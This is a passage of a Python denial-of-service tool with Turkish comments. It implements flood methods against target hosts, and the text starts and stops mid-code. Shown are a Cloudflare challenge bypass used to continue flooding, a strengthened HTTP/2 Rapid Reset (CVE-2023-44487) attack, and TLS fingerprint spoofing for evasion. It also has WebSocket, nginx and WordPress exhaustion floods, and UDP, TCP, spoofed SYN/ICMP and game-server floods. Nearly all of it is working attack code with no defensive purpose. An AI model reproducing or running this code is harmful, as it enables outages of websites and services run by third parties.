f"X-Forwarded-For: {ip}\r\n" f"X-Real-IP: {ip}\r\n" f"CF-Connecting-IP: {ip}\r\n" f"If-None-Match: {etag}\r\n" f"If-Modified-Since: Mon, 01 Jan 2024 00:00:00 GMT\r\n" f"Sec-Fetch-Dest: {'style' if ext=='css' else 'script' if ext=='js' else 'image' if ext in ('png','jpg','ico','svg') else 'document'}\r\n" f"Sec-Fetch-Mode: no-cors\r\n" f"Sec-Fetch-Site: same-origin\r\n" f"\r\n" ).encode() if not send(s, pl): break close(s) # ══════════════════════════════════════════════════════════════════════════════ # YENİ METOTLAR: CF_BYPASS · RAPID_RESET · TLS_SPOOF · KILLER # ══════════════════════════════════════════════════════════════════════════════ # ── HTTP/2 raw frame builder (stdlib, harici kütüphane yok) ─────────────────── def _h2f(ftype, flags, sid, payload=b''): """9-byte HTTP/2 frame header + payload.""" l = len(payload) return (struct.pack('!BBB', (l>>16)&0xFF, (l>>8)&0xFF, l&0xFF) + struct.pack('!BB', ftype, flags) + struct.pack('!I', sid & 0x7FFFFFFF) + payload) _H2_PREFACE = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n' _H2_INIT = (_h2f(0x4, 0, 0) + # SETTINGS _h2f(0x8, 0, 0, struct.pack('!I', 0x3FFFFFFF))) # WINDOW_UPDATE def _h2_hpack(host, path): """HPACK static table ile minimal header blok (path/host ≤126 byte).""" p = (path.encode() if isinstance(path, str) else path)[:126] h = (host.encode() if isinstance(host, str) else host)[:126] return (b'\x82\x87' # :method GET, :scheme https + b'\x04' + bytes([len(p)]) + p # :path literal (idx 4) + b'\x41' + bytes([len(h)]) + h) # :authority literal (idx 1) # ── Built-in CF Challenge Solver (stdlib only — cloudscraper mantığından uyarlandı) ── # Kaynak: cloudflare_v2.py::handle_V2_Challenge, cloudflare_v3.py::handle_V3_Challenge, # stealth.py::_apply_browser_quirks, user_agent/__init__.py, browsers.json # Bağımlılık: sıfır. # Chrome cipher suite (browsers.json'dan birebir) _CS_CHROME = ( 'TLS_AES_128_GCM_SHA256:TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:' 'ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:' 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:' 'ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:' 'ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA:' 'AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA' ) # Firefox cipher suite (browsers.json'dan birebir — sıra farklı, bu JA3'ü ayıran şey) _CS_FIREFOX = ( 'TLS_AES_128_GCM_SHA256:TLS_CHACHA20_POLY1305_SHA256:TLS_AES_256_GCM_SHA384:' 'ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:' 'ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:' 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:' 'ECDHE-ECDSA-AES256-SHA:ECDHE-ECDSA-AES128-SHA:' 'ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA:' 'DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:AES128-SHA:AES256-SHA' ) # Browser profilleri — UA, header sırası, sabit headerlar (stealth.py + browsers.json) _BP = { 'chrome': { 'ua': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36', 'ciphers': _CS_CHROME, 'order': ['Host','Connection','sec-ch-ua','sec-ch-ua-mobile','sec-ch-ua-platform', 'User-Agent','Accept','Sec-Fetch-Site','Sec-Fetch-Mode','Sec-Fetch-User', 'Sec-Fetch-Dest','Accept-Encoding','Accept-Language','Cookie'], 'fixed': { 'Connection': 'keep-alive', 'sec-ch-ua': '"Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Windows"', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8', 'Sec-Fetch-Site': 'none', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9', } }, 'firefox': { 'ua': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0', 'ciphers': _CS_FIREFOX, 'order': ['Host','User-Agent','Accept','Accept-Language','Accept-Encoding', 'Connection','Upgrade-Insecure-Requests','Cookie'], 'fixed': { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests':'1', 'TE': 'trailers', } }, } def _mk_ssl(browser='chrome'): """Browser cipher suite ile SSLContext (stdlib ssl, CipherSuiteAdapter mantığı).""" ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE ctx.minimum_version = ssl.TLSVersion.TLSv1_2 with suppress(Exception): ctx.set_ciphers(_BP.get(browser, _BP['chrome'])['ciphers']) with suppress(Exception): ctx.set_ecdh_curve('prime256v1') return ctx def _mk_opener(browser, jar): """Cookie jar + browser cipher suite ile urllib opener (stealth.py header sırası).""" import urllib.request prof = _BP.get(browser, _BP['chrome']) opener = urllib.request.build_opener( urllib.request.HTTPSHandler(context=_mk_ssl(browser)), urllib.request.HTTPRedirectHandler(), urllib.request.HTTPCookieProcessor(jar), ) hdrs = [('User-Agent', prof['ua'])] for k in prof['order']: if k in prof['fixed'] and k != 'User-Agent': hdrs.append((k, prof['fixed'][k])) opener.addheaders = hdrs return opener # CF challenge tespit regex'leri (cloudflare.py, cloudflare_v2.py, cloudflare_v3.py'den) import re as _re _CF_V3_RE = _re.compile(r"cpo\.src\s*=.*?orchestrate/jsch/v3|window\._cf_chl_ctx\s*=|__cf_chl_rt_tk=", _re.S) _CF_V2_RE = _re.compile(r"cpo\.src\s*=.*?orchestrate/(?:jsch|managed)/v[12]|window\._cf_chl_opt\s*=|__cf_chl_f_tk=", _re.S) _CF_BLCK_RE = _re.compile(r'1020', _re.S) _CF_TURN_RE = _re.compile(r'class="cf-turnstile"|challenges\.cloudflare\.com/turnstile', _re.S) _CF_R_RE = _re.compile(r'name=["\']r["\'][^>]+value=["\']([^"\']{10,})["\']') _CF_ACT_RE = _re.compile(r']+id="challenge-form"[^>]+action="([^"]+)"', _re.S) _CF_OPT_RE = _re.compile(r'window\._cf_chl_opt\s*=\s*(\{.*?\});', _re.S) def _cf_type(body, resp_headers): """Yanıttan CF challenge türünü tespit et (None = CF yok).""" h = {k.lower(): v for k, v in (resp_headers or {}).items()} if not (h.get('server', '').lower().startswith('cloudflare') or 'cf-ray' in h): return None if _CF_BLCK_RE.search(body): return 'blocked' if _CF_TURN_RE.search(body): return 'turnstile' if _CF_V3_RE.search(body): return 'v3' if _CF_V2_RE.search(body): return 'v2' return None def _cf_solve(url, browser='chrome', jar=None, timeout=15): """ CF V2/V3 IUAM challenge çöz (saf stdlib). Logic kaynağı: cloudflare_v2.py::handle_V2_Challenge + generate_challenge_payload cloudflare_v3.py::handle_V3_Challenge + extract_v3_challenge_data cloudflare.py::Challenge_Response (delay + POST + redirect takibi) Adımlar: 1. Browser cipher suite ile GET → CF challenge sayfası al 2. challenge türünü tespit et 3. r token + form action extract et 4. _cf_chl_opt JSON'dan cvId/chlPageData ekle 5. 4-5s bekle (CF'nin JS challenge timer'ı) 6. POST → redirect takip et → cf_clearance cookie'si set olur Döner: "cf_clearance=" ya da None """ import urllib.request, urllib.error, http.cookiejar as hcj, json as _js from urllib.parse import urlencode, urljoin, urlparse if jar is None: jar = hcj.CookieJar() parsed = urlparse(url) base = f"{parsed.scheme}://{parsed.netloc}" opener = _mk_opener(browser, jar) prof = _BP.get(browser, _BP['chrome']) try: body, resp_headers = '', {} try: r = opener.open(url, timeout=timeout) body = r.read().decode('utf-8', errors='ignore') resp_headers = dict(r.headers) except urllib.error.HTTPError as e: body = e.read().decode('utf-8', errors='ignore') resp_headers = dict(e.headers) except Exception: return None ctype = _cf_type(body, resp_headers) if ctype in (None, 'blocked', 'turnstile'): for ck in jar: if ck.name == 'cf_clearance': return f'cf_clearance={ck.value}' return None rm = _CF_R_RE.search(body) am = _CF_ACT_RE.search(body) if not rm or not am: for ck in jar: if ck.name == 'cf_clearance': return f'cf_clearance={ck.value}' return None action_url = am.group(1) if not action_url.startswith('http'): action_url = urljoin(base, action_url) # generate_challenge_payload (cloudflare_v2.py) payload = {'r': rm.group(1), 'cf_ch_verify': 'plat', 'vc': '', 'captcha_vc': '', 'cf_captcha_kind': 'h', 'h-captcha-response': ''} om = _CF_OPT_RE.search(body) if om: with suppress(Exception): opt = _js.loads(om.group(1)) if 'cvId' in opt: payload['cv_chal_id'] = opt['cvId'] if 'chlPageData' in opt: payload['cf_chl_page_data'] = opt['chlPageData'] # delay (cloudflare.py submit() regex) dm = _re.search(r'submit\(\).*?},\s*(\d+)', body, _re.S) time.sleep(max(4.0, min(float(dm.group(1)) / 1000 if dm else 5.0, 10.0))) # POST + redirect takibi req = urllib.request.Request(action_url, urlencode(payload).encode(), method='POST') req.add_header('User-Agent', prof['ua']) req.add_header('Origin', base) req.add_header('Referer', url) req.add_header('Content-Type', 'application/x-www-form-urlencoded') req.add_header('Accept', prof['fixed']['Accept']) with suppress(Exception): opener.open(req, timeout=timeout) except Exception: pass for ck in jar: if ck.name == 'cf_clearance': return f'cf_clearance={ck.value}' return None # ── CF_BYPASS ───────────────────────────────────────────────────────────────── def w_CF_BYPASS(t, rpc): """ Saf stdlib CF bypass — dışa bağımlılık yok. Chrome/Firefox cipher suite + CF V2/V3 challenge solver + cookie carry-forward. cf_clearance alındıktan sonra aynı jar ile flood devam eder. """ import urllib.request, http.cookiejar as hcj url = f"{t.scheme}://{t.auth}{t.path}" while not _stop.is_set(): with suppress(Exception): browser = random.choice(list(_BP.keys())) jar = hcj.CookieJar() _cf_solve(url, browser=browser, jar=jar, timeout=12) opener = _mk_opener(browser, jar) for _ in range(rpc): if _stop.is_set(): break with suppress(Exception): r = opener.open(url, timeout=8) d = r.read() with _lock: SENT[0] += 1; BYTES[0] += len(d) # ── RAPID_RESET ─────────────────────────────────────────────────────────────── def _h2_hpack_full(host, path): """ Tam tarayıcı HPACK bloğu — sunucu başına daha pahalı header parsing. Literal without indexing (0x00 prefix) ile user-agent, accept, accept-encoding eklenir; sunucu daha fazla bellek + parse süresi harcar. """ def _ls(b): # HPACK string: length byte (max 127, no Huffman) + bytes b = b[:127] return bytes([len(b)]) + b p = (path.encode() if isinstance(path, str) else path)[:127] h = (host.encode() if isinstance(host, str) else host)[:127] ua = b'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36'[:127] return ( b'\x82\x87' # :method GET, :scheme https + b'\x04' + _ls(p) # :path + b'\x41' + _ls(h) # :authority + b'\x00' + _ls(b'user-agent') + _ls(ua) # user-agent + b'\x00' + _ls(b'accept') + _ls(b'text/html,application/xhtml+xml,*/*;q=0.9') + b'\x00' + _ls(b'accept-encoding') + _ls(b'gzip, deflate, br') + b'\x00' + _ls(b'accept-language') + _ls(b'en-US,en;q=0.9') ) def w_RAPID_RESET(t, rpc): """ HTTP/2 Rapid Reset (CVE-2023-44487) — güçlendirilmiş versiyon (stdlib only). Saldırı özü: HEADERS frame → sunucu request slot açar (memory + goroutine/thread) RST_STREAM CANCEL → slot serbest kalır — AMA sunucu işlem kuyruğunu boşaltamadan yenileri gelirse kuyruk taşar → OOM / event loop tıkanır. Eski sürüme göre iyileştirmeler: 1. _mk_ssl('chrome') — browser TLS el sıkışması → daha fazla TLS kabulü 2. SO_SNDBUF 512 KB — kernel gönderim tamponu büyütüldü → veri birikimiyor 3. SETTINGS INITIAL_WINDOW_SIZE = 2³¹-1 — sunucu stream başına max buffer ayırır 4. Server SETTINGS okunup SETTINGS ACK gönderilir — sunucu bağlantıyı korur 5. WINDOW_UPDATE keepalive her 64 stream — flow control bitişi önlenir 6. 128 KB batch — tek sendall'da daha fazla frame → az syscall, yüksek throughput 7. Zengin HPACK (_h2_hpack_full) — sunucu stream başına daha fazla bellek + parse 8. rpc başına iterasyon: max(rpc*100, 5000) — düşük rpc'de bile etkili """ if not t.tls: w_GET(t, rpc); return _BATCH = 131072 # 128 KB batch eşiği _WSMAX = 0x7FFFFFFF # H2 max window size _RST = struct.pack('!I', 8) # CANCEL error code _WU64 = _h2f(0x8, 0, 0, struct.pack('!I', 65535)) # conn WINDOW_UPDATE _SACK = _h2f(0x4, 0x1, 0) # SETTINGS ACK iters = max(rpc * 100, 5000) # stream sayısı — düşük rpc'de de etkili while not _stop.is_set(): with suppress(Exception): # 1. Browser cipher suite ile TLS — daha az "unknown client" reddi ctx = _mk_ssl('chrome') raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM) raw.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) with suppress(Exception): raw.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1 << 19) # 512 KB raw.settimeout(10) raw.connect((t.host, t.port)) s = ctx.wrap_socket(raw, server_hostname=t.host) # 2. Preface + SETTINGS: INITIAL_WINDOW_SIZE max + connection WINDOW_UPDATE s.sendall( _H2_PREFACE + _h2f(0x4, 0, 0, struct.pack('!HI', 0x4, _WSMAX)) + _h2f(0x8, 0, 0, struct.pack('!I', _WSMAX)) ) # 3. Server SETTINGS oku + ACK — bağlantı ömrünü uzatır s.settimeout(0.4) try: s.recv(512) # server SETTINGS frame s.settimeout(None) s.sendall(_SACK) # SETTINGS ACK → sunucu mutlu except Exception: pass s.settimeout(None) # 4. Rapid Reset bombardımanı sid = 1 buf = b'' count = 0 for i in range(iters): if _stop.is_set() or sid > 0x7FFFFF0: break hpack = _h2_hpack_full(t.host, t.path) buf += _h2f(0x1, 0x4, sid, hpack) # HEADERS END_HEADERS buf += _h2f(0x3, 0x0, sid, _RST) # RST_STREAM CANCEL sid += 2 count += 1 # WINDOW_UPDATE keepalive — her 64 stream'de bir if count % 64 == 0: buf += _WU64 # 128 KB dolunca gönder — tek syscall ile max frame if len(buf) >= _BATCH: s.sendall(buf) with _lock: SENT[0] += count; BYTES[0] += len(buf) buf = b''; count = 0 if buf: with suppress(Exception): s.sendall(buf) with _lock: SENT[0] += max(1, count); BYTES[0] += len(buf) close(s) # ── TLS_SPOOF ───────────────────────────────────────────────────────────────── def w_TLS_SPOOF(t, rpc): """ TLS cipher suite spoof — stdlib ssl ile Chrome/Firefox TLS el sıkışması. browsers.json'dan alınan gerçek cipher sıraları kullanılır; her session farklı browser seçer → CF'nin TLS parmak izi tespitini bozar. Dışa bağımlılık yok. """ import urllib.request, http.cookiejar as hcj url = f"{t.scheme}://{t.auth}{t.path}" while not _stop.is_set(): with suppress(Exception): browser = random.choice(list(_BP.keys())) jar = hcj.CookieJar() opener = _mk_opener(browser, jar) for _ in range(rpc): if _stop.is_set(): break with suppress(Exception): r = opener.open(url, timeout=8) d = r.read() with _lock: SENT[0] += 1; BYTES[0] += len(d) # ── KILLER ──────────────────────────────────────────────────────────────────── _KILLER_IDX = [0] def w_KILLER(t, rpc): """ KILLER — 3 vektörü eş zamanlı çalıştır. Thread N%3=0 → RAPID_RESET (HTTP/2 CVE-2023-44487) Thread N%3=1 → CF_BYPASS (cloudscraper) veya UAM_BYPASS (cookie varsa) Thread N%3=2 → TLS_SPOOF (JA3 fingerprint) Her vektör threads/3 thread alır; hedef 3 farklı açıdan aynı anda zorlanır. """ with _lock: _KILLER_IDX[0] += 1 role = _KILLER_IDX[0] % 3 if role == 0: w_RAPID_RESET(t, rpc) elif role == 1: if _UAM_ORIGIN_IPS or _UAM_COOKIE_STR: w_UAM_BYPASS(t, rpc) else: w_CF_BYPASS(t, rpc) else: w_TLS_SPOOF(t, rpc) # ══════════════════════════════════════════════════════════════════════════════ # WEBSOCKET_KILLER · NGINX_KILLER · WORDPRESS_KILLER # ══════════════════════════════════════════════════════════════════════════════ def _ws_frame(opcode, payload=b''): """RFC 6455 WebSocket istemci frame'i — FIN=1, masked (client zorunluluğu).""" mask = os.urandom(4) p = bytes(b ^ mask[i % 4] for i, b in enumerate( payload if isinstance(payload, (bytes, bytearray)) else payload.encode())) n = len(p) if n <= 125: hdr = bytes([0x80 | opcode, 0x80 | n]) elif n <= 65535: hdr = bytes([0x80 | opcode, 0x80 | 126]) + struct.pack('!H', n) else: hdr = bytes([0x80 | opcode, 0x80 | 127]) + struct.pack('!Q', n) return hdr + mask + p _WS_PATHS = [ '/ws', '/websocket', '/wss', '/chat', '/live', '/realtime', '/socket.io/', '/events', '/stream', '/api/ws', '/push', '/notifications', '/hub', '/hubs', '/signalr/connect', '/sockjs/websocket', '/cable', '/updates', '/feed', ] _WS_PING = _ws_frame(0x09) # PING opcode _WS_CLOSE = _ws_frame(0x08) # CLOSE opcode def w_WEBSOCKET_KILLER(t, rpc): """ WebSocket bağlantı tüketici + frame flood (stdlib only). Teknik 1 — Slowloris WS (thread %3==0, ~33%): WS Upgrade handshake → bağlantıyı açık tut → her 20s PING frame. Sunucunun max_connections / worker_connections limitini tüketir. Teknik 2 — Frame flood (thread %3==1, ~33%): Handshake → 128 B–8 KB arası TEXT/BINARY frame'ler → parse + buffer yükü. ws.send() işleyici her frame için event döngüsünde slot açar. Teknik 3 — Upgrade spam (thread %3==2, ~33%): Sadece Upgrade başlığı gönder, 101 beklemeden bağlantıyı kapat. Her deneme yeni TCP+TLS handshake → accept() queue doldurma. Endpoint rotasyonu: /ws, /websocket, /socket.io/, /chat, /live vb. """ import base64 as _b64 with _lock: _KILLER_IDX[0] += 1 role = _KILLER_IDX[0] % 3 while not _stop.is_set(): with suppress(Exception): path = random.choice(_WS_PATHS) key = _b64.b64encode(os.urandom(16)).decode() upgrade_req = ( f"GET {path} HTTP/1.1\r\n" f"Host: {t.auth}\r\n" f"Connection: Upgrade\r\n" f"Upgrade: websocket\r\n" f"Sec-WebSocket-Key: {key}\r\n" f"Sec-WebSocket-Version: 13\r\n" f"Origin: {t.scheme}://{t.host}\r\n" f"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n" f"\r\n" ).encode() if role == 2: # Upgrade spam — no read s = t.conn(3) send(s, upgrade_req) with _lock: SENT[0] += 1 close(s) continue s = t.conn(10) send(s, upgrade_req) # 101 Switching Protocols bekliyoruz s.settimeout(2) try: resp = s.recv(512).decode('utf-8', errors='ignore') upgraded = '101' in resp except Exception: upgraded = False s.settimeout(None) if role == 0: # Slowloris WS for _ in range(rpc * 5): if _stop.is_set(): break time.sleep(20) if not send(s, _WS_PING): break with _lock: SENT[0] += 1 else: # Frame flood for _ in range(rpc): if _stop.is_set(): break sz = random.choice([128, 512, 1024, 4096, 8192]) frm = _ws_frame(random.choice([0x01, 0x02]), os.urandom(sz)) if not send(s, frm): break with _lock: SENT[0] += 1; BYTES[0] += len(frm) close(s) # ── NGINX_KILLER ────────────────────────────────────────────────────────────── def w_NGINX_KILLER(t, rpc): """ Nginx'e özgü çok-vektör L7 flood. Teknik 1 — HTTP/1.1 Pipeline flood (40%): Tek TCP bağlantıda rpc adet GET → nginx worker o bağlantıyı sırayla işler. worker_connections dolduğunda yeni bağlantılar reddedilir. Teknik 2 — Header buffer overflow (30%): ~7.8 KB rastgele isim=değer header'ları → nginx large_client_header_buffers (default: 4×8 KB) max kullanıma iter → header parsing bellek basıncı. Teknik 3 — Range exhaustion (20%): Range: bytes=0-0,5-10,...,4995-5000 (1000 range) → nginx range parser + her range için ayrı sendfile/read → disk I/O + çekirdek context switch. Teknik 4 — Slow POST body (10%): Content-Length: 50 MB + body yok → nginx client_body_timeout (default 60s) boyunca worker bağlantısı meşgul → bağlantı havuzu tükenir. """ while not _stop.is_set(): with suppress(Exception): role = rint(0, 9) if role < 4: # Pipeline flood s = t.conn(10) req = (f"GET {t.path} HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\nAccept: */*\r\n" f"Connection: keep-alive\r\n\r\n") pipeline = req.encode() * rpc send(s, pipeline) with _lock: SENT[0] += rpc; BYTES[0] += len(pipeline) close(s) elif role < 7: # Header overflow s = t.conn(6) # 8 adet ~1 KB başlık → ~8 KB toplam (nginx sınırına yakın) hdrs = ''.join(f"X-{rstr(8).capitalize()}: {rstr(980)}\r\n" for _ in range(8)) req = (f"GET {t.path} HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\n" + hdrs + "\r\n").encode() send(s, req) with _lock: SENT[0] += 1; BYTES[0] += len(req) close(s) elif role < 9: # Range exhaustion s = t.conn(6) ranges = ','.join(f"{i*5}-{i*5+4}" for i in range(1000)) req = (f"GET {t.path} HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\n" f"Range: bytes={ranges}\r\n\r\n").encode() send(s, req) with _lock: SENT[0] += 1; BYTES[0] += len(req) close(s) else: # Slow POST body wait s = t.conn(75) cl = rint(50_000_000, 200_000_000) # 50–200 MB Content-Length req = (f"POST {t.path} HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\n" f"Content-Type: application/octet-stream\r\n" f"Content-Length: {cl}\r\n\r\n").encode() send(s, req) for _ in range(rpc * 3): # body damla damla → nginx bekler if _stop.is_set(): break time.sleep(2) if not send(s, b'x'): break with _lock: SENT[0] += 1 close(s) # ── WORDPRESS_KILLER ────────────────────────────────────────────────────────── def w_WORDPRESS_KILLER(t, rpc): """ WordPress'e özgü çok-vektör L7 flood. Cache'siz + PHP/MySQL ağır endpoint'ler: 1. wp-login.php POST — PHP session + DB auth sorgusu 2. /?s=random — posts LIKE sorgusu (tam tablo taraması, no-cache) 3. /xmlrpc.php — wp.getUsersBlogs auth + DB 4. /wp-json/wp/v2/posts — REST API + JOIN query + JSON encode 5. admin-ajax heartbeat — session check + option yükleme 6. /?p=N&preview=true — tam WP çalışması, cache bypass 7. wp-comments-post.php — antispam + DB insert 8. /?cat=N&feed=rss2 — RSS + DB query + XML generate Her istek WP'yi tam bootstrap eder: 50-200+ DB sorgusu + PHP eval yükü. """ _ACTIONS = ['heartbeat', 'query-attachments', 'ajax-tag-search', 'wp-compression-test', 'get-permalink'] while not _stop.is_set(): with suppress(Exception): s = t.conn(8) mode = rint(0, 7) if mode == 0: # wp-login.php POST body = (f"log={rstr(8)}&pwd={rstr(12)}&wp-submit=Log+In" f"&redirect_to=%2Fwp-admin%2F&testcookie=1") req = (f"POST /wp-login.php HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\n" f"Referer: {t.scheme}://{t.host}/wp-login.php\r\n" f"Content-Type: application/x-www-form-urlencoded\r\n" f"Content-Length: {len(body)}\r\nConnection: keep-alive\r\n\r\n" f"{body}").encode() for _ in range(rpc): if _stop.is_set() or not send(s, req): break elif mode == 1: # DB search — full table scan (LIKE %random%) for _ in range(rpc): if _stop.is_set(): break q = rstr(rint(4, 10)) req = (f"GET /?s={q} HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\nAccept: text/html\r\n\r\n").encode() if not send(s, req): break elif mode == 2: # xmlrpc flood body = (f'' f'wp.getUsersBlogs' f'{rstr(8)}' f'{rstr(12)}' f'') req = (f"POST /xmlrpc.php HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\nContent-Type: text/xml\r\n" f"Content-Length: {len(body)}\r\n\r\n{body}").encode() for _ in range(rpc): if _stop.is_set() or not send(s, req): break elif mode == 3: # REST API search for _ in range(rpc): if _stop.is_set(): break q = rstr(rint(3, 8)) req = (f"GET /wp-json/wp/v2/posts?search={q}&_={rint(0,9999999)} HTTP/1.1\r\n" f"Host: {t.auth}\r\nUser-Agent: {rua()}\r\n" f"Accept: application/json\r\n\r\n").encode() if not send(s, req): break elif mode == 4: # admin-ajax heartbeat (WP session + options yükü) for _ in range(rpc): if _stop.is_set(): break nonce = rstr(10) action = random.choice(_ACTIONS) body = f"action={action}&_nonce={nonce}&interval=15" req = (f"POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\n" f"Content-Type: application/x-www-form-urlencoded\r\n" f"Content-Length: {len(body)}\r\n\r\n{body}").encode() if not send(s, req): break elif mode == 5: # preview — tam WP bootstrap, cache bypass for _ in range(rpc): if _stop.is_set(): break req = (f"GET /?p={rint(1,9999)}&preview=true HTTP/1.1\r\n" f"Host: {t.auth}\r\nUser-Agent: {rua()}\r\n" f"Accept: text/html\r\n\r\n").encode() if not send(s, req): break elif mode == 6: # wp-comments-post — antispam + DB insert for _ in range(rpc): if _stop.is_set(): break body = (f"comment={rstr(200)}&author={rstr(6)}" f"&email={rstr(8)}%40mail.com&url=" f"&submit=Post+Comment" f"&comment_post_ID={rint(1,100)}&comment_parent=0") req = (f"POST /wp-comments-post.php HTTP/1.1\r\nHost: {t.auth}\r\n" f"User-Agent: {rua()}\r\n" f"Referer: {t.scheme}://{t.host}/?p={rint(1,100)}\r\n" f"Content-Type: application/x-www-form-urlencoded\r\n" f"Content-Length: {len(body)}\r\n\r\n{body}").encode() if not send(s, req): break else: # RSS feed — DB query + XML generate for _ in range(rpc): if _stop.is_set(): break req = (f"GET /?cat={rint(1,50)}&feed=rss2 HTTP/1.1\r\n" f"Host: {t.auth}\r\nUser-Agent: {rua()}\r\n" f"Accept: application/rss+xml,*/*\r\n\r\n").encode() if not send(s, req): break with _lock: SENT[0] += rpc close(s) # ══════════════════════════════════════════════════════════════════════════════ # L4 METOTLARI # ══════════════════════════════════════════════════════════════════════════════ def w_UDP(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while not _stop.is_set(): sndto(s, os.urandom(1024), (ip,port)) close(s) def w_TCP(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.settimeout(0.9); s.connect((ip,port)) while not _stop.is_set(): if not send(s, os.urandom(1024)): break close(s) def w_SYN(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host has_root = (os.name != 'nt' and os.geteuid() == 0) if not has_root: # root yok: TCP bağlantı flood fallback w_TCP(host, port); return with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) while not _stop.is_set(): sndto(s, mk_syn(rip(),ip,port), (ip,0)) close(s) def w_ICMP(host, *_): try: ip=socket.gethostbyname(host) except: ip=host has_root = (os.name != 'nt' and os.geteuid() == 0) if not has_root: # root yok: UDP fallback w_UDP(host, 0); return with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) while not _stop.is_set(): sndto(s, mk_icmp(rip(),ip), (ip,0)) close(s) def w_CPS(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.settimeout(0.9); s.connect((ip,port)) SENT[0]+=1; close(s) def w_CONNECTION(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host def _a(): with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.settimeout(0.9); s.connect((ip,port)); SENT[0]+=1 while not _stop.is_set(): if not s.recv(1): break close(s) Thread(target=_a, daemon=True).start() def w_VSE(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host pl=b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00' with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while not _stop.is_set(): sndto(s, pl, (ip,port)) close(s) def w_TS3(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host pl=b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02' with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while not _stop.is_set(): sndto(s, pl, (ip,port)) close(s) def w_MCPE(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host pl=b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f\x77\x6e\x20\x61\x73\x73' with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while not _stop.is_set(): sndto(s, pl, (ip,port)) close(s) def w_FIVEM(host, port, *_): try: ip=socket.gethostbyname(host) except: ip=host pl=b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00' with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while not _stop.is_set(): sndto(s, pl, (ip,port)) close(s) def w_DISCORD(host, port, 